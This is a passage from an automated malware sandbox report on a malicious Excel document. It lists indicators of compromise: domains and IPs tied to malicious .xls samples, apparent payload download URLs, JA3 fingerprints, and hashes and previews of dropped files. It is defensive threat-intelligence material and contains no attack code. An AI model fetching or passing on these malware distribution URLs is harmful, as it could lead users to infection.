www.tm.a.prd.aadg.akadns.net, r20swj13mr.microsoft.com, a134.lm.akamai.net, login.msa.msidentity.com, e-0001.e-msedge.net, a-0001.a-afdentry.net.trafficmanager.net, go.microsoft.com.edgekey.net, apps.digsigtrust.com, www.tm.lg.prod.aadmsa.trafficmanager.net, cs9.wpc.v0cdn.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:29:53	API Interceptor	713x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
207.174.213.126	document-1305160161.xlsb	Get hash	malicious	Browse	nhseven.tk/ds/08.gif
	document-414236719.xlsb	Get hash	malicious	Browse	nhseven.tk/ds/08.gif
	document-1249966242.xlsb	Get hash	malicious	Browse	nhseven.tk/ds/08.gif
	http://anandice.ac.in/Paid-Invoice-Credit-Card-Receipt/	Get hash	malicious	Browse	anandice.ac.in/Paid-Invoice-Credit-Card-Receipt/
162.241.62.4	document-69564892.xls	Get hash	malicious	Browse
	document-1320073816.xls	Get hash	malicious	Browse
	document-184653858.xls	Get hash	malicious	Browse
	document-1729033050.xls	Get hash	malicious	Browse
	document-1268722929.xls	Get hash	malicious	Browse
	document-540475316.xls	Get hash	malicious	Browse
	document-1456634656.xls	Get hash	malicious	Browse
	document-12162673.xls	Get hash	malicious	Browse
	document-997754822.xls	Get hash	malicious	Browse
	document-1376447212.xls	Get hash	malicious	Browse
	document-1813856412.xls	Get hash	malicious	Browse
	document-1776123548.xls	Get hash	malicious	Browse
	document-1201008736.xls	Get hash	malicious	Browse
	document-684762271.xls	Get hash	malicious	Browse
	document-1590815978.xls	Get hash	malicious	Browse
	document-800254041.xls	Get hash	malicious	Browse
	document-469719570.xls	Get hash	malicious	Browse
	document-1686823268.xls	Get hash	malicious	Browse
	document-66411652.xls	Get hash	malicious	Browse
	document-415601328.xls	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
mundotecnologiasolar.com	document-69564892.xls	Get hash	malicious	Browse	162.241.62.4
	document-1320073816.xls	Get hash	malicious	Browse	162.241.62.4
	document-184653858.xls	Get hash	malicious	Browse	162.241.62.4
	document-1729033050.xls	Get hash	malicious	Browse	162.241.62.4
	document-1268722929.xls	Get hash	malicious	Browse	162.241.62.4
	document-540475316.xls	Get hash	malicious	Browse	162.241.62.4
	document-1456634656.xls	Get hash	malicious	Browse	162.241.62.4
	document-12162673.xls	Get hash	malicious	Browse	162.241.62.4
	document-997754822.xls	Get hash	malicious	Browse	162.241.62.4
	document-1376447212.xls	Get hash	malicious	Browse	162.241.62.4
	document-1813856412.xls	Get hash	malicious	Browse	162.241.62.4
	document-1776123548.xls	Get hash	malicious	Browse	162.241.62.4
	document-1201008736.xls	Get hash	malicious	Browse	162.241.62.4
	document-684762271.xls	Get hash	malicious	Browse	162.241.62.4
	document-1590815978.xls	Get hash	malicious	Browse	162.241.62.4
	document-800254041.xls	Get hash	malicious	Browse	162.241.62.4
	document-469719570.xls	Get hash	malicious	Browse	162.241.62.4
	document-1686823268.xls	Get hash	malicious	Browse	162.241.62.4
	document-66411652.xls	Get hash	malicious	Browse	162.241.62.4
	document-415601328.xls	Get hash	malicious	Browse	162.241.62.4
accesslinksgroup.com	document-69564892.xls	Get hash	malicious	Browse	192.185.129.4
	document-1320073816.xls	Get hash	malicious	Browse	192.185.129.4
	document-184653858.xls	Get hash	malicious	Browse	192.185.129.4
	document-1729033050.xls	Get hash	malicious	Browse	192.185.129.4
	document-1268722929.xls	Get hash	malicious	Browse	192.185.129.4
	document-540475316.xls	Get hash	malicious	Browse	192.185.129.4
	document-1456634656.xls	Get hash	malicious	Browse	192.185.129.4
	document-12162673.xls	Get hash	malicious	Browse	192.185.129.4
	document-997754822.xls	Get hash	malicious	Browse	192.185.129.4
	document-1376447212.xls	Get hash	malicious	Browse	192.185.129.4
	document-1813856412.xls	Get hash	malicious	Browse	192.185.129.4
	document-1776123548.xls	Get hash	malicious	Browse	192.185.129.4
	document-1201008736.xls	Get hash	malicious	Browse	192.185.129.4
	document-684762271.xls	Get hash	malicious	Browse	192.185.129.4
	document-1590815978.xls	Get hash	malicious	Browse	192.185.129.4
	document-800254041.xls	Get hash	malicious	Browse	192.185.129.4
	document-469719570.xls	Get hash	malicious	Browse	192.185.129.4
	document-1686823268.xls	Get hash	malicious	Browse	192.185.129.4
	document-66411652.xls	Get hash	malicious	Browse	192.185.129.4
	document-415601328.xls	Get hash	malicious	Browse	192.185.129.4

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
UNIFIEDLAYER-AS-1US	document-69564892.xls	Get hash	malicious	Browse	192.185.129.4
	document-1320073816.xls	Get hash	malicious	Browse	192.185.129.4
	t51PMqFkL8.dll	Get hash	malicious	Browse	162.144.76.184
	document-184653858.xls	Get hash	malicious	Browse	192.185.129.4
	document-1729033050.xls	Get hash	malicious	Browse	192.185.129.4
	document-1268722929.xls	Get hash	malicious	Browse	192.185.129.4
	document-540475316.xls	Get hash	malicious	Browse	192.185.129.4
	document-1456634656.xls	Get hash	malicious	Browse	192.185.129.4
	document-12162673.xls	Get hash	malicious	Browse	192.185.129.4
	document-997754822.xls	Get hash	malicious	Browse	192.185.129.4
	document-1376447212.xls	Get hash	malicious	Browse	192.185.129.4
	document-1813856412.xls	Get hash	malicious	Browse	192.185.129.4
	document-1776123548.xls	Get hash	malicious	Browse	192.185.129.4
	document-1201008736.xls	Get hash	malicious	Browse	192.185.129.4
	document-684762271.xls	Get hash	malicious	Browse	192.185.129.4
	document-1590815978.xls	Get hash	malicious	Browse	192.185.129.4
	document-800254041.xls	Get hash	malicious	Browse	192.185.129.4
	document-469719570.xls	Get hash	malicious	Browse	192.185.129.4
	document-1686823268.xls	Get hash	malicious	Browse	192.185.129.4
	document-66411652.xls	Get hash	malicious	Browse	192.185.129.4
PUBLIC-DOMAIN-REGISTRYUS	document-69564892.xls	Get hash	malicious	Browse	5.100.155.169
	document-1320073816.xls	Get hash	malicious	Browse	5.100.155.169
	document-184653858.xls	Get hash	malicious	Browse	5.100.155.169
	document-1729033050.xls	Get hash	malicious	Browse	5.100.155.169
	document-1268722929.xls	Get hash	malicious	Browse	5.100.155.169
	document-540475316.xls	Get hash	malicious	Browse	5.100.155.169
	document-1456634656.xls	Get hash	malicious	Browse	5.100.155.169
	document-12162673.xls	Get hash	malicious	Browse	5.100.155.169
	document-997754822.xls	Get hash	malicious	Browse	5.100.155.169
	document-1376447212.xls	Get hash	malicious	Browse	5.100.155.169
	document-1813856412.xls	Get hash	malicious	Browse	5.100.155.169
	document-1776123548.xls	Get hash	malicious	Browse	5.100.155.169
	document-1201008736.xls	Get hash	malicious	Browse	5.100.155.169
	document-684762271.xls	Get hash	malicious	Browse	5.100.155.169
	document-1590815978.xls	Get hash	malicious	Browse	5.100.155.169
	document-800254041.xls	Get hash	malicious	Browse	5.100.155.169
	document-469719570.xls	Get hash	malicious	Browse	5.100.155.169
	document-1686823268.xls	Get hash	malicious	Browse	5.100.155.169
	document-66411652.xls	Get hash	malicious	Browse	5.100.155.169
	document-415601328.xls	Get hash	malicious	Browse	5.100.155.169

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
7dcce5b76c8b17472d024758970a406b	document-69564892.xls	Get hash	malicious	Browse	207.174.213.126 198.50.218.68 162.241.62.4 5.100.155.169 192.185.129.4
	document-1320073816.xls	Get hash	malicious	Browse	207.174.213.126 198.50.218.68 162.241.62.4 5.100.155.169 192.185.129.4
	document-184653858.xls	Get hash	malicious	Browse	207.174.213.126 198.50.218.68 162.241.62.4 5.100.155.169 192.185.129.4
	document-1729033050.xls	Get hash	malicious	Browse	207.174.213.126 198.50.218.68 162.241.62.4 5.100.155.169 192.185.129.4
	document-1268722929.xls	Get hash	malicious	Browse	207.174.213.126 198.50.218.68 162.241.62.4 5.100.155.169 192.185.129.4
	document-540475316.xls	Get hash	malicious	Browse	207.174.213.126 198.50.218.68 162.241.62.4 5.100.155.169 192.185.129.4
	document-1456634656.xls	Get hash	malicious	Browse	207.174.213.126 198.50.218.68 162.241.62.4 5.100.155.169 192.185.129.4
	document-12162673.xls	Get hash	malicious	Browse	207.174.213.126 198.50.218.68 162.241.62.4 5.100.155.169 192.185.129.4
	document-997754822.xls	Get hash	malicious	Browse	207.174.213.126 198.50.218.68 162.241.62.4 5.100.155.169 192.185.129.4
	document-1376447212.xls	Get hash	malicious	Browse	207.174.213.126 198.50.218.68 162.241.62.4 5.100.155.169 192.185.129.4
	document-1813856412.xls	Get hash	malicious	Browse	207.174.213.126 198.50.218.68 162.241.62.4 5.100.155.169 192.185.129.4
	document-1776123548.xls	Get hash	malicious	Browse	207.174.213.126 198.50.218.68 162.241.62.4 5.100.155.169 192.185.129.4
	document-1201008736.xls	Get hash	malicious	Browse	207.174.213.126 198.50.218.68 162.241.62.4 5.100.155.169 192.185.129.4
	document-684762271.xls	Get hash	malicious	Browse	207.174.213.126 198.50.218.68 162.241.62.4 5.100.155.169 192.185.129.4
	document-1590815978.xls	Get hash	malicious	Browse	207.174.213.126 198.50.218.68 162.241.62.4 5.100.155.169 192.185.129.4
	document-800254041.xls	Get hash	malicious	Browse	207.174.213.126 198.50.218.68 162.241.62.4 5.100.155.169 192.185.129.4
	document-469719570.xls	Get hash	malicious	Browse	207.174.213.126 198.50.218.68 162.241.62.4 5.100.155.169 192.185.129.4
	document-1686823268.xls	Get hash	malicious	Browse	207.174.213.126 198.50.218.68 162.241.62.4 5.100.155.169 192.185.129.4
	document-66411652.xls	Get hash	malicious	Browse	207.174.213.126 198.50.218.68 162.241.62.4 5.100.155.169 192.185.129.4
	document-415601328.xls	Get hash	malicious	Browse	207.174.213.126 198.50.218.68 162.241.62.4 5.100.155.169 192.185.129.4

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0104[1].gif	document-69564892.xls	Get hash	malicious	Browse
	document-1320073816.xls	Get hash	malicious	Browse
C:\Users\user\fikftkm.thj2	document-69564892.xls	Get hash	malicious	Browse
C:\Users\user\fikftkm.thj2	document-1320073816.xls	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Microsoft Cabinet archive data, 58596 bytes, 1 file
Category:	dropped
Size (bytes):	58596
Entropy (8bit):	7.995478615012125
Encrypted:	true
SSDEEP:	1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
MD5:	61A03D15CF62612F50B74867090DBE79
SHA1:	15228F34067B4B107E917BEBAF17CC7C3C1280A8
SHA-256:	F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
SHA-512:	5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
Malicious:	false
Reputation:	high, very likely benign file
Preview:	MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............\|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>..V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..\|0.+?.`-../.xvy..e......w.+^...w\|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g\|.z..+.D8.m..F .h............ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	893
Entropy (8bit):	7.366016576663508
Encrypted:	false
SSDEEP:	24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
MD5:	D4AE187B4574036C2D76B6DF8A8C1A30
SHA1:	B06F409FA14BAB33CBAF4A37811B8740B624D9E5
SHA-256:	A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
SHA-512:	1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
Malicious:	false
Reputation:	high, very likely benign file
Preview:	0..y...H.........j0..f...1.0....H.........N0..J0..2.......D....'..09...@k0....H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0....H.............0..........P..W..be......,k0.[...}.@......3vI.?!I..N..>H.e...!.e..2....w..{........s.z..2..~..0....8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i.....)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0....H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..\|.Wv..(9..e...w.j..w.......)...55.1.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	326
Entropy (8bit):	3.1085305984908564
Encrypted:	false
SSDEEP:	6:kKeJkcwTJ6YN+SkQlPlEGYRMY9z+4KlDA3RUe0ht:2twTJ6HkPlE99SNxAhUe0ht
MD5:	763B86892741884878549D1DF6371FB7
SHA1:	BA7DAF292E78A80D44387095FD0B6FE3881C0AC0
SHA-256:	22C4A0FFB0D65C9548546664557B249ACCC467AC74338EDBE018D2039B5FDDEF
SHA-512:	5511E2DED86665119BEDA15C8D236D362B49490F84C3E7FA21DF3228A968FDB14E21FFACE6D7AE49F6FEA3D977B96737DABD3077D46985ED7F099AF2FB53CDEE
Malicious:	false
Preview:	p...... ............4)..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	252
Entropy (8bit):	3.021526964532168
Encrypted:	false
SSDEEP:	3:kkFklCRMykVXfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFc:kKt0liBAIdQZV7eAYLit
MD5:	5E4F4CDAA07D665942B5368F7FFB2893
SHA1:	7AFD3E6A05EE9A686AE01D45AE126417BAA520A7
SHA-256:	EB9CC5E0400C9F0E7687CA1CAE2B38C27E24602E4A0DB8A615ECA5146680E5CE
SHA-512:	D359B7BBC3B510500C6F351D451709EF62E0D53917FACA41E409C188958C2D6D36955EB20B234219000464D0AB25E9E341E3296BABC6FEAF8FB163616526E9AE
Malicious:	false
Preview:	p...... ....`....F,.4)..(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...

C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
Category:	dropped
Size (bytes):	4286
Entropy (8bit):	3.8046022951415335
Encrypted:	false
SSDEEP:	24:suZOWcCXPRS4QAUs/KBy3TYI42Apvl6wheXpktCH2Yn4KgISQggggFpz1k9PAYHu:HBRh+sCBykteatiBn4KWi1+Ne
MD5:	DA597791BE3B6E732F0BC8B20E38EE62
SHA1:	1125C45D285C360542027D7554A5C442288974DE
SHA-256:	5B2C34B3C4E8DD898B664DBA6C3786E2FF9869EFF55D673AA48361F11325ED07
SHA-512:	D8DC8358727590A1ED74DC70356AEDC0499552C2DC0CD4F7A01853DD85CEB3AEAD5FBDC7C75D7DA36DB6AF2448CE5ABDFF64CEBDCA3533ECAD953C061A9B338E
Malicious:	false
Preview:	...... .... .........(... ...@..... ...................................................................................................................................................................................................N...Sz..R...R...P...N..L..H..DG..........................................................................................R6..U...U...S...R...P...N..L..I..F..B...7...............................................................................S6..V...V...U...S...R...P...N..L..I..F..C...?..:z......................................................................O...W...V...V...U...S...R...P...N..L..I..E..C...?...;..{7..q2$..............................................................T..D..]...S)..p6..J...R...P...N..L..I..E..B..>..;..z7..p2..f,X.........................................................A..O#..N!..N!..N!..P$..q:...P...N..K..I..E..A..=..9..x5..n0..e,...5...................................................Ea.Z,..T$..T$..T

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{60425BEA-9528-11EB-ADCF-ECF4BBB5915B}.dat Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	29272
Entropy (8bit):	1.7721483806791933
Encrypted:	false
SSDEEP:	48:IvVBGcpUnaGwp0tvzG/apntaDsZGIpHtaD0tGvnZpEtaD0fy/GoqVqpqtaD0fyA4:MV3KnCK1Tp08J0Da0l00vV30RY0KB
MD5:	26282310E8455967162AE7F3B2A810EC
SHA1:	CDEDDF77ACAC761F6A474ECA5E2FB528EF9FEFE2
SHA-256:	9B6A43ABC7C96A3490A6F0D7CE52CB7732984365078003099A00033ACD2DA211
SHA-512:	B50067E1246F31D0055DD762AEAC79655EFEA4C72530D0E5BAA53A72D5746813FAC3A677EEF08FAF1CD5BFD4F36D45A0263103C96C4F23BEFBD38389BE90D59C
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{7B4C373D-9528-11EB-ADCF-ECF4BBB5915B}.dat Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	46680
Entropy (8bit):	1.9175735878495213
Encrypted:	false
SSDEEP:	192:MJKKKDpRJVaI90RM7I38zzlBVWP0LM4Yo9AMA0qMpIo2qNT1fVx3ryW:MQNFjUtnUVx1HNzL
MD5:	321428C7E78F716D65331B9AAA22A514
SHA1:	0F2027821924D8E000DB9070DE891EDF9C291671
SHA-256:	14D33E314A6DD65F8B80BCE868B8520BF47682DCC557F3DC15C8FE35EC24A50A
SHA-512:	E96E879271185D8B9371362146F4D441C2C9FFB6792F7B1992CB39AF40725761C2064695278388E6D0FF488DDCB78A8A02C73CBA744ABCEE1E3CDEB6A4AA437A
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{60425BEC-9528-11EB-ADCF-ECF4BBB5915B}.dat Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	42616
Entropy (8bit):	2.4376542126804934
Encrypted:	false
SSDEEP:	192:MyKZbNJb7ecpplJwzAlqPqXA8XOgDXzKQZIzKQZfSzKQZDK1gazeBrYnA:M1pHvvrHmEqMAuOgDXHIHfSHO+a6B0A
MD5:	B372BF7147CBE18978EA7E30D4AE4183
SHA1:	7E92774C461F2A7DC6E932A1B2513A703C4979DE
SHA-256:	59EA3A6C9C1B2DA419F6CAECB573E2F19422313CD5EB034FDD26A2D6A5384168
SHA-512:	35B96FA843726CA52E903FE6869DA85B81EFA9BF10C51801BD2F09B564768C7938A7C1D4DB03D6F8AB2FA7A82FFF040558FCFD3008C8564C08F99D90CE65CE85
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{7B4C373F-9528-11EB-ADCF-ECF4BBB5915B}.dat Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27368
Entropy (8bit):	1.8445120820778484
Encrypted:	false
SSDEEP:	96:MUKHbcJ6eSJcBp5JI/zlapuHVceuHV3FWYA:MUKHbcJ67JcBp5JI/zlapuHOeuH9MYA
MD5:	30F6C0403C2FF60BB0AAA13076C1BD84
SHA1:	1472D9793694F132175E463736BF703F1C8D7E65
SHA-256:	30279AA0238A1C82D416F1C61C12C366D6B0627E63135523D46BEA1FFA179A15
SHA-512:	2E563F66A82AE721E84C25CB58AF15FAD8E2B97678395FA4A49ECC8D10F442CF9B3BD89CE357E035DEFFAEA30BCBC646D6CB947CA81BF114384FC85DFC64EC2B
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8AC52904-9528-11EB-ADCF-ECF4BBB5915B}.dat Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	19032
Entropy (8bit):	1.5857825935170993
Encrypted:	false
SSDEEP:	48:IvOGcpUDGwpNqG4pPOGrapgSLZGQpZkG7HpCIaTGIpM2AGApm:MSKdbKJAeS3/v0Bazg
MD5:	A375489160ED508AA93BEA756DCE6B06
SHA1:	29893DF47BDF0C29B291B7D1B68808F00E515EAA
SHA-256:	BC028D7D5B957F8EEBE2A175D0DEC0D313AB530F064914E6D409A3E75FEE5AC9
SHA-512:	277A837424CC2AE23A5FE41DC4F94A6FDDA6EA1B4E4A05879F0D8BED628A1F81A48D80BD24089C9CA47ADC90A9A0BB6B1874EE3BFD520E8FB514686006C1D958
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\HdepnBaFj-yarvouFUIlfV4Q9D8.gz[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	3201
Entropy (8bit):	5.369958740257869
Encrypted:	false
SSDEEP:	48:rmo6TIPx85uuYPXznTBB0D6e7htJETfD8QJLxDO7KTUx42Z3rtki:sYuYPXznb0DR7dw8QhIWTQrt7
MD5:	4AADD0F43326BAD8EFD82C85B6D9A20E
SHA1:	4093FC4AB9821B646D64C98051A1CF0679CB2188
SHA-256:	968849A1E6AAED249C78B6CF1AF585AB6C8482A8C5398AB1D2DC3CB92E9EA68F
SHA-512:	616B06A6E3B2385E5487C819FC7F595D473B2F14E8CB76EFB894EDEAB3B26D2C9B679A9B275D924BECC37E156C70B0B56126CCFB62C8B23ABBA9DE07BD93D72A
Malicious:	false
IE Cache URL:	http://www.bing.com/rp/HdepnBaFj-yarvouFUIlfV4Q9D8.gz.js
Preview:	var __spreadArrays=this&&this.__spreadArrays\|\|function(){for(var i=0,n=0,r=arguments.length;n<r;n++)i+=arguments[n].length;for(var u=Array(i),f=0,n=0;n<r;n++)for(var e=arguments[n],t=0,o=e.length;t<o;t++,f++)u[f]=e[t];return u};define("clientinst",["require","exports"],function(n,t){function it(){a=0;u()}function u(){var n,s,t,o;e&&clearTimeout(e);for(n in i)if(i.hasOwnProperty(n)){s=n!=_G.IG?_G.lsUrl.replace(_G.IG,n):_G.lsUrl;for(t in i[n])i[n].hasOwnProperty(t)&&(o=b+s+"&TYPE=Event."+t+"&DATA="+f("[")+i[n][t]+f("]"),ut(o)\|\|(g().src=o));delete i[n]}typeof r!="undefined"&&r.setTimeout&&(e=r.setTimeout(u,w))}function rt(){return _G!==undefined&&_G.EF!==undefined&&_G.EF.logsb!==undefined&&_G.EF.logsb===1}function ut(n){return rt()?ft(n,""):!1}function ft(n,t){var i="sendBeacon",r=!1;if(navigator&&navigator[i])try{navigator[i](n,t);r=!0}catch(u){}return r}var y,d,i,g,o,p;t.__esModule=!0;t.Wrap=t.Log2=t.LogInstrumented=t.Log=t.LogCustomEvent=void 0;var r=n("env"),s=n("event.native"),h=n("e

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\NGDGShwgz5vCvyjNFyZiaPlHGCE.gz[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	252
Entropy (8bit):	4.837090729138339
Encrypted:	false
SSDEEP:	6:qbLkyK4hImTzBwhLM1whA+XzFE8KSiQLGPQQgnaqza:IQD2IkzaLMGAMzDBVKY+ia
MD5:	1F62E9FDC6CA43F3FC2C4FA56856F368
SHA1:	75ADD74C4E04DB88023404099B9B4AAEA6437AE7
SHA-256:	E1436445696905DF9E8A225930F37015D0EF7160EB9A723BAFC3F9B798365DF6
SHA-512:	6AADAA42E0D86CAD3A44672A57C37ACBA3CB7F85E5104EB68FA44B845C0ED70B3085AA20A504A37DDEDEA7E847F2D53DB18B6455CDA69FB540847CEA6419CDBC
Malicious:	false
IE Cache URL:	http://www.bing.com/rp/NGDGShwgz5vCvyjNFyZiaPlHGCE.gz.js
Preview:	var Button;(function(){WireUp.init("button_init",function(n){var t=n.getAttribute("data-appns"),i=n.getAttribute("data-k");sj_be(n,"click",function(){Log.Log("Click","Button","",!1,"AppNS",t,"K",i,"Category","CommonControls")})})})(Button\|\|(Button={}))

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\P3LN8DHh0udC9Pbh8UHnw5FJ8R8.gz[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	1516
Entropy (8bit):	5.30762660027466
Encrypted:	false
SSDEEP:	24:+FE64YTsQF61KWllWeM2lSoiLKiUfpIYdk+fzvOMuHMH34tDO8XgGQE3BUf4JPwk:+FdF6UYXEBi9kIHIB1UY
MD5:	EF3DA257078C6DD8C4825032B4375869
SHA1:	35FE0961C2CAF7666A38F2D1DE2B4B5EC75310A1
SHA-256:	D94AC1E4ADA7A269E194A8F8F275C18A5331FE39C2857DCED3830872FFAE7B15
SHA-512:	DBA7D04CDF199E68F04C2FECFDADE32C2E9EC20B4596097285188D96C0E87F40E3875F65F6B1FF5B567DCB7A27C3E9E8288A97EC881E00608E8C6798B24EF3AF
Malicious:	false
IE Cache URL:	http://www.bing.com/rp/P3LN8DHh0udC9Pbh8UHnw5FJ8R8.gz.js
